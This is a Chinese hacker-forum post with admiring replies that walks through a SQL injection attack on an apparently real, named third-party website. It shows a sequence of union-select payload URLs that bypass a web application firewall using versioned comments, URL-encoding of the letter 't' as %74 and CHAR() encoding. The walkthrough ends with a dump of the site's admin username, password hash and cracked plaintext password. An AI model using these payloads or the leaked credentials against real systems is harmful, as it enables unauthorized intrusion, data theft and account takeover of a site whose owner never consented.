WAF绕过URL编辑入侵

xlbck · 发表于 2019-5-21 23:41:05

案例解读怎样运用URL编号绕开WAF防范
WAF
SQL引入点
http://www.magrabiyemen.com/contents.php?id=3
字符串数为4
http://www.magrabiyemen.com/contents.php?id=3 order by 4
显视位为4
http://www.magrabiyemen.com/contents.php?id=3 union select 1,2,3,4
显视基本资料没问题
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version())
暴表的当时出現not acceptable
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
试着绕开，失败，仍然回到图中如图
http://www.magrabiyemen.com/contents.php?id=3 /*!12345UNION*/ /*!12345SELECT*/ 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()
应用URL编号完成绕开（t历经URL编号后为%74）
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(%74able_name) from informa%74ion_schema.tables where %74able_schema=da%74abase()
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(column_name) from informa%74ion_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)
URL编号绕开WAF
http://www.magrabiyemen.com/contents.php?id=3 UNION SELECT 1,2,3,group_concat(username,0x3a,password) from users
URL编号绕开WAF
admin:ea4ce35c2860112178e8ae2285579919
破译出去为：admin/123456789987654321

版权声明

1、转载或引用本网站内容须注明原网址，并标明本网站网址(http://www.cn-sl.com)。

2、转载或引用本网站中的署名文章，请按规定向原作者支付稿酬。

3、对于不当转载或引用本网站内容而引起的民事纷争、行政处理或其他损失，本网站不承担责任。

4、对不遵守本声明或其他违法、恶意使用本网站内容者，本网站保留追究其法律责任的权利。

唯一网址: http://www.cn-sl.com/hack-116-1-1.html

小黑 · 发表于 2019-5-21 23:44:21

支持楼主,也支持黑客联盟

heimao · 发表于 2019-5-21 23:52:02

这个分享的不错收藏了

黑客之家 · 发表于 2019-5-22 05:09:25

太感动了,分享这么好的软件

黑联盟合作组 · 发表于 2019-5-22 06:16:30

这个分享的不错收藏了

黑联盟编辑组 · 发表于 2019-5-22 07:10:34

祝黑客联盟越做越好,加油

[渗透测试] WAF绕过URL编辑入侵

版权声明

让创业更简单

关于我们

云服务支持

黑客联盟，快速搜索

关注我们